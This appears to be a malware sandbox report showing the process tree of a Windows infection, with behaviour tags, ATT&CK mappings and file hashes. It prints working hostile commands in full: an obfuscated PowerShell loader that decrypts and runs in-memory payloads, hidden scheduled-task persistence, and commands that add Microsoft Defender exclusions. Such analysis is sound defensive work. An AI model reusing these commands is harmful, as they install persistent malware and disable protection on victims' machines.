C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_26_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5032
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:2672
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2904
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
1KB
MD5ade8b780188478d4bf68c97bc995b06f
SHA10b5124fca500da8f833a3be98bd5f732d3962343
SHA256318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b
SHA512c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD565a68df1062af34622552c4f644a5708
SHA16f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA5124e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d
-
Filesize
944B
MD5ce4540390cc4841c8973eb5a3e9f4f7d
SHA12293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA5122a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
410KB
MD5d87efb4cf8da07e1956944f23313bb5b
SHA1929203873eaf41e02377a26e1ef4db8a88d37696
SHA256f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd
SHA512d726064d2833f4ee4a52dc85515f6dd471e72acd53d2576916313a0aaa224e199ba56cdf6fbd5fe4b21be62ab38779adc1b977b333971f160ac8cf3e26ba952a
-
Filesize
123B
MD598eb70b5a07a68222fc1c5cf60e90217
SHA18b1d0dc0a07ccefa7a11ee65cf409093120a2247
SHA2564b6bcc6bfb9a7f6ffb7b7a90b07ac8cafbfde7f52ccba6ef0289dd0be66f4732
SHA5129d386ba6e8ad3f79efeec389da4292abaef3efdbd6a47ee68cc59cc89fbbfd8aa5d5d2df40d17ace328696e68e0074e45f8bcf6bf460957c67167dc4a444cd3d
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b